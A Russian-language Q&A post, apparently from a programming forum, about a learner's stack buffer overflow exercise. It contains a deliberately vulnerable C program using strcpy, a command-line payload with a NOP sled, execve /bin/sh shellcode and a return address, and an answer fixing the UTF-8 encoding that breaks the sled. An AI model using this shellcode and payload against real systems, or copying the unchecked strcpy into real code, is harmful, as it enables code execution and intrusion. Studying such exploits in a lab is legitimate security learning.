# buffer overflow: с290 вместо \x90 опкода

Tags: linux, c, gcc, gdb

Пытаюсь понять уязвимость buffer overflow, выяснил сколько нужно подать на ввод байт, чтобы изменить регистр `RIP`, но столкнулся с проблемой: когда подаю данные в программу, опкоды команды `NOP` воспринимаются не как `\x90`, а как `c290`. То есть я запускаю программу в GDB c параметром:

```
$(python3 -c "print('''\x90'''*13+'''\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'''+'''\x90'''*2+'''\xad\x05\x40\x00\x00\x00''')")
```

Но, когда после входа в уязвимую функцию я проверяю параметры, на которые указывает регистр `rax`, я обнаруживаю, что символ `\x90` был интерпретирован немножко не так, как я ожидал:

```
gdb-peda$ x/2 $rax
    0x7fffffffe207: 0x90c290c290c290c2  0x90c290c290c290c2
```

Код самой "уязвимой" программы:

```
#include <string.h>
#include <stdio.h>

int foo(char *bar)
{
    int loggedin = 0;
    char password[50];
    strcpy(password, bar);
    if(strcmp(password, "secur3")==0)
    {
         loggedin = 1;
    }
    return loggedin;
}

int main(int argc, char **argv)
    {
    if(foo(argv[1]))
    {
        printf("\n\nLoggedin\n\n");
    }
    else
    {
        printf("\n\nLogin Failed!\n\n");
    }
    return 0;
}
```

С чем это может быть связано?

Answer (score 2, accepted):

0x90c2 это ваш код 0x90 в кодировке UTF-8

Третий питон как я понял берет текущую системную кодировку и в ней печатает символы. Выполните перед тем как запускать вашу программу (в шелле)

```
LANG=en_US
export LANG
```

После этого питон выдает нормальную строку NOP'ов
Остальное не проверял, ибо питон запускаю первый раз в жизни